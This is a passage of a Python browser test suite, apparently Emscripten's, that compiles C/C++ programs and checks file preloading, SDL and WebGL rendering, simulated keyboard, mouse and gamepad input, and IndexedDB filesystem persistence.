self.compile_btest(['main.c', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_multifile(self):
# a few files inside a directory
ensure_dir('subdirr/moar')
create_file('subdirr/data1.txt', '1214141516171819')
create_file('subdirr/moar/data2.txt', '3.14159265358979')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
assert(strcmp("3.14159265358979", buf) == 0);
return 0;
}
''')
# by individual files
self.btest_exit('main.c', args=['--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt'])
# by directory, and remove files to make sure
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--preload-file', 'subdirr', '-o', 'page.html'], reporting=Reporting.JS_ONLY)
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?exit:0')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(Path('subdirr/data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
default_shell = read_file(path_from_root('src/shell.html'))
create_file('shell.html', default_shell.replace('var Module = {', '''
var Module = {
locateFile: function(path, prefix) {
if (path.endsWith(".wasm")) {
return prefix + path;
} else {
return "cdn/" + path;
}
},
'''))
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
return 0;
}
''')
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.data', Path('cdn/test.data'))
self.run_browser('test.html', '', '/report_result?exit:0')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
          // This code should never be executed, because the required dependency file is missing.
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.disableErrorReporting = true;
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
      # test that a missing file makes xhr.onload run with a status other than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
@also_with_wasmfs
def test_dev_random(self):
self.btest_exit(Path('filesystem/dev_random.cpp'))
def test_sdl_swsurface(self):
self.btest_exit('sdl_swsurface.c', args=['-lSDL', '-lGL'])
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.btest_exit(src, args=[
'-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
@also_with_wasmfs
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.btest_exit(src, args=[
'-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
@parameterized({
'': ([],),
# add testing for closure on preloaded files + ENVIRONMENT=web (we must not
# emit any node.js code here, see
    # https://github.com/emscripten-core/emscripten/issues/14486)
'closure_webonly': (['--closure', '1', '-sENVIRONMENT=web'],)
})
def test_sdl_image_prepare_data(self, args):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'] + args, manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest_exit('sdl_stb_image_cleanup.c', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O0', '-sSAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O2', '-sSAFE_HEAP', '-lSDL', '-lGL'])
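  # Used by tests passing manual_reference=True: appends the generated reftest.js to the
  # page and wraps window.close() so the reftest runs after the last frame has rendered.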
def post_manual_reftest(self, reference=None):
self.reftest(test_file(self.reference if reference is None else reference))
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
    # test .js target with --proxy-to-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-sGL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-sASSERTIONS', '-sSAFE_HEAP', '-sASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest_exit('canvas_focus.c')
def test_keydown_preventdefault_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-sEXPORTED_FUNCTIONS=_main'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
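    # Custom page: the canvas sits inside a container offset by 5px, so the test (built
    # with -DTEST_SDL_MOUSE_OFFSETS) must account for the canvas position on the page
    # when translating mouse coordinates.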
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest_exit('glut_touchevents.c', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest_exit('glut_wheelevents.c', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit(test_file('test_glfw_joystick.c'), args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-sUSE_GLFW=3'])
@requires_graphics_hardware
def test_webgl_context_attributes(self):
    # JavaScript code to check support for the attributes we want to test in the WebGL implementation
    # (request the attribute, create a context and check its value afterwards in the context attributes).
    # Tests will succeed even when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.basename(filepath)
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl2.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-sUSE_SDL=2', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
    # perform tests with attributes deactivated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest_exit('webgl_error.cpp')
@requires_graphics_hardware
def test_webgl_parallel_shader_compile(self):
self.btest_exit('webgl_parallel_shader_compile.cpp')
@requires_graphics_hardware
def test_webgl_explicit_uniform_location(self):
self.btest_exit('webgl_explicit_uniform_location.c', args=['-sGL_EXPLICIT_UNIFORM_LOCATION=1', '-sMIN_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sampler_layout_binding(self):
self.btest_exit('webgl_sampler_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1'])
@requires_graphics_hardware
def test_webgl2_ubo_layout_binding(self):
self.btest_exit('webgl2_ubo_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1', '-sMIN_WEBGL_VERSION=2'])
# Test that -sGL_PREINITIALIZED_CONTEXT works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest_exit('preinitialized_webgl_context.cpp', args=['-sGL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-sUSE_PTHREADS'], ['-sENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest_exit('emscripten_get_now.cpp', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-sENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-sEXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_file('moar.txt', secret)
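    # The first run (-DFIRST) stores the preloaded secret; the later runs have no (or a
    # different) preloaded file and must still read the stored secret back, verifying that
    # the data persists across page loads.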
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-sFORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-sEXIT_RUNTIME', '-sASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
